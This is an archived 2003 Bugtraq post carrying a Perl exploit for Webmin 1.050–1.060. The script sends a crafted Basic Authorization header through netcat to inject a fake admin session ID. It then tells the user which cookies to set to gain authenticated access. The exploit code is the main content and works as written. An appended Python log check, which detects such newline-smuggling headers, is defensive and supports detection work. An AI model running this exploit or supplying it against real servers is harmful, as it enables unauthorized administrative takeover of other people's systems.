91471 2003-02-24 17:04 /40 lines/ Carl Livitt <carl@learningshophull.co.uk>
Attachment filename: "webmin-exploit.pl"
Imported: 2003-02-24 17:04 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: carl@learningshophull.co.uk
Recipient: Bugtraq (import) <3622>
Attachment (text/plain) to text 91470
Subject: Attachment (webmin-exploit.pl) to: Webmin 1.050 - 1.060 remote exploit
------------------------------------------------------------
#!/usr/bin/perl
#
# Exploit for Webmin 1.050 -> 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#

print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n";

$nc="/usr/bin/netcat";

if($#ARGV == -1) {
    print "Syntax:\n\t$0 hostname\n";
    exit(1);
}

$hostname=$ARGV[0];

if ( ! -x $nc ) {
    print "netcat not found!\n";
    exit(2);
}

open(NC, "|$nc $hostname 10000 >& /dev/null");
print NC "GET / HTTP/1.1\n";
print NC "Host: $hostname\n";
print NC "User-agent: webmin\n";
print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n";
close(NC);

print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n";
print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
print "be authenticated to the webmin server!\n\n";
print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";
(91471) /Carl Livitt <carl@learningshophull.co.uk>/(Reflowed)
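A defender-side check, added here and not part of Carl Livitt's post or of Webmin itself: it decodes Basic Authorization headers from request logs and flags any whose decoded credential contains a line break, which is the mechanism the script above depends on (an extra "new <sid> <user>" record smuggled in behind the credentials). The header lines are constructed samples; the first reuses the base64 value from the posted script, the other two are ordinary logins.

```python
import base64
import re

# Constructed sample request headers (not captured traffic). The first is the
# value from the posted exploit; the other two are benign "user:pass" logins.
SAMPLE_HEADERS = [
    "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=",
    "Authorization: Basic YWRtaW46cGFzc3dvcmQ=",  # admin:password
    "Authorization: Basic Ym9iOnNlY3JldA==",      # bob:secret
]

_BASIC_RE = re.compile(r"^Authorization:\s*Basic\s+(\S+)\s*$", re.I)


def decode_basic(header):
    """Return the decoded credential string for a Basic header, or None when
    the line is not a Basic header or the token is not valid base64."""
    m = _BASIC_RE.match(header)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("latin-1")


def is_injection(decoded):
    """A legitimate Basic credential is a single 'user:pass' line. A CR, LF
    or any other control character means extra records are being pushed
    into whatever consumes the decoded string (here, miniserv's session
    list when 'passdelay' is enabled)."""
    return any(ord(ch) < 0x20 for ch in decoded)


def flag_headers(headers):
    """Return [(raw_header, decoded_lines)] for every suspicious header."""
    hits = []
    for h in headers:
        decoded = decode_basic(h)
        if decoded is not None and is_injection(decoded):
            hits.append((h, decoded.splitlines()))
    return hits


if __name__ == "__main__":
    for raw, lines in flag_headers(SAMPLE_HEADERS):
        print("suspicious Basic header:", raw)
        for line in lines:
            print("   decoded record:", repr(line))
```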